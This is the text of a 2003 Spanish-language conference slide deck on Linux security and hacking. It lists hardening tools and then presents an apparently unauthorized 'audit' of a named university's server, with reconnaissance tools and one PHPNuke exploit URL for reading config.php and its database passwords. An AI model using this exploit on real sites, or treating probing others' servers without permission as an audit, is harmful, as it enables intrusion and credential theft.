seguridad y hacking en linux
TRANSCRIPT
![Page 1: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/1.jpg)
SEGURIDAD Y HACKINGEN LINUX
Alonso Eduardo Caballero Quezada - ReYDeS -RareGaZz Security Team http://www.RareGaZz.orgSecurity Wari Projetcs http://www.SWP-zone.org
informatizate http://www.informatizate.net
Sábado 21 de Junio del 2003
![Page 2: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/2.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad en GNU/Linux
2. Un típico Incidente de Seguridad.
3. Ejemplo Real. (U.N.T)
![Page 3: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/3.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad en GNU/Linux
Seguridad:
Seguridad es la característica de unsistema informático, que indica queese sistema está libre de todopeligro.
“La seguridad es un estado mental”
![Page 4: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/4.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Que proteger?
. SoftWare
. HardWare
. Datos
![Page 5: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/5.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
De quien nos protegemos?
- Personas:
. Personal de la empresa . Ex-empleados . Curiosos . Hackers . Crackers . Terroristas (*) . Intrusos Remunerados
- Desastres Naturales:
![Page 6: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/6.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
- Amenazas Logicas:
. Software incorrecto . Herramientas de seguridad . Puertas traseras (Backdoor) . Bombas Logicas . Canales cubiertos . Virus . Gusanos . Caballos de Troya . Programas conejo . Técnicas Salami
![Page 7: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/7.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD EN LINUX
![Page 8: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/8.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Definición de los servicios necesarios.
. Servidor Web (Apache) . Servidor de Correo (Sendmail) . Servidor SSH, FTP, DNS etc.
![Page 9: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/9.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
2. Utilizar Herramientas de Bastionado. (BASTILLE ó TITAN)
. Educa al administrador sobre potenciales problemas de seguridad en el sistema.
![Page 10: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/10.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
3. Utilizar un Antivirus basado en Software Libre. (AmaViS)
. Indicado cuando hay interacción entre Linux u otro sistema Operativo.
![Page 11: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/11.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
4. Utilización de un PROXY (SQUID).
. Un punto de acceso entre una intranet y una internet.
. Control de los datos. (squid1Guard)
![Page 12: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/12.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
5. Instalación y configuración de un Firewall. (IPTABLES).
. Un punto estratégico de vigilancia del sistema.
. Creación de reglas para las conecciones y servicios.
![Page 13: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/13.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
6. Detección de Instrusos basados en HOST. (Tripwire)
. Comprobar la integridad de los archivos en el sistema.
![Page 14: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/14.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
7. Sistema Detector de Intrusos (IDS)
. Vigilancia del Servidor. . Detección de actividad sospechosa. . Respuesta mediata e inmediata
. Uso de (ACID) Consola de D.I
![Page 15: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/15.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
8. Administrador . Persona adecuada.
. Experiencia. (*)
. Actualización constante.
![Page 16: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/16.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
HACKING EN LINUX
![Page 17: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/17.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
ADVERTENCIA:
El artículo completo y detalladode lo expuesto a continuación sera publicado en la eZine RareGaZz Número 20. http://www.RareGaZz.org
Todo esta información se expone solo con finesdidacticos y de conocimiento. De ninguna manera el autor o el Grupo RareGaZz induce a realizar este tipo de acciones.
ReYDeS / RareGaZz Security Team
![Page 18: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/18.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Institución:
Universidad Nacional de Trujillo
URL:
http://www.unitru.edu.pe
Tiempo Total:
2 horas.
Objetivo:
Auditoria Personal y Libre de la Seguridad del servidor de la Universidad Nacional de Trujillo
![Page 19: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/19.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Primer Punto:
Obtener todo la informacion posible delsistema.
- Tools
. NMAP (www.insecure.org/nmap) . NIKTO (http://www.cirt.net/code/nikto.shtml) . NetCat . Comandos propios de Linux, desde un simple ping a un dig por ejemplo.
- Software De Auditoria:
. NESSUS (http://www.nessus.org)
![Page 20: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/20.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
NMAP
![Page 21: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/21.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Nessus
![Page 22: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/22.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 23: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/23.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Sistemas Vulnerables: PHPNuke 5.2 y anteriores
Sistemas Inmunes: PHPNuke 5.0 RC1
Exploit: First run the following URL:http://www.example.net/admin.php?upload=1 &file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php &userfile_name=hacked.txt
Mediante la anterior peticion de la anterior URL se podríaobserver leer en “config.php”. El cual contiene las claves de laBase de Datos. Con todas las posibles consecuencias que elloacarrea.
![Page 24: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/24.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 25: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/25.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 26: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/26.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 27: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/27.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 28: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/28.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 29: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/29.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 30: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/30.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 31: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/31.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 32: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/32.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 33: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/33.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 34: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/34.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 35: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/35.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
![Page 36: Seguridad y Hacking en Linux](https://reader033.vdocuments.us/reader033/viewer/2022052412/5589006dd8b42a23708b45f6/html5/thumbnails/36.jpg)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I